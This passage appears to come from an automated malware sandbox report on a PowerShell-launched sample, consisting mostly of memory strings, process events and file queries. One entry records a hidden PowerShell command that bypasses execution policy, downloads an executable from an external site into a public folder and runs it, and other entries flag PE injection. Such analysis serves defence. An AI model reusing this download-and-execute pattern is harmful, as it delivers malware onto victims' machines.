                Source: powershell.exe, 00000015.00000002.480502864.000001F1C2D60000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.497094078.0000022BEE1D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: powershell.exe, 00000015.00000002.479717397.000001F1C289D000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.dll
                Source: powershell.exe, 00000015.00000002.480502864.000001F1C2D60000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.497094078.0000022BEE1D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: powershell.exe, 00000015.00000002.480262467.000001F1C2B40000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
                Source: powershell.exe, 00000015.00000002.480502864.000001F1C2D60000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.497094078.0000022BEE1D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\Public\kzsuoseu.exeProcess token adjusted: Debug
                Source: C:\Users\Public\kzsuoseu.exeProcess token adjusted: Debug
                Source: C:\Users\Public\kzsuoseu.exeProcess token adjusted: Debug
                Source: C:\Users\Public\kzsuoseu.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Bypasses PowerShell execution policyShow sources
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}'
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\Public\kzsuoseu.exeMemory written: C:\Users\Public\kzsuoseu.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\Public\kzsuoseu.exeMemory written: C:\Users\Public\kzsuoseu.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\kzsuoseu.exe 'C:\Users\Public\kzsuoseu.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\kzsuoseu.exe 'C:\Users\Public\kzsuoseu.exe'
                Source: C:\Users\Public\kzsuoseu.exeProcess created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
                Source: C:\Users\Public\kzsuoseu.exeProcess created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
                Source: C:\Users\Public\kzsuoseu.exeProcess created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
                Source: kzsuoseu.exe, 0000001E.00000002.516844814.0000000001940000.00000002.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.516865416.00000000011D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: kzsuoseu.exe, 0000001E.00000002.516844814.0000000001940000.00000002.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.516865416.00000000011D0000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: kzsuoseu.exe, 0000001E.00000002.516844814.0000000001940000.00000002.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.516865416.00000000011D0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                Source: kzsuoseu.exe, 0000001E.00000002.516844814.0000000001940000.00000002.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.516865416.00000000011D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                Source: kzsuoseu.exe, 0000001E.00000002.516844814.0000000001940000.00000002.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.516865416.00000000011D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Users\Public\kzsuoseu.exe VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
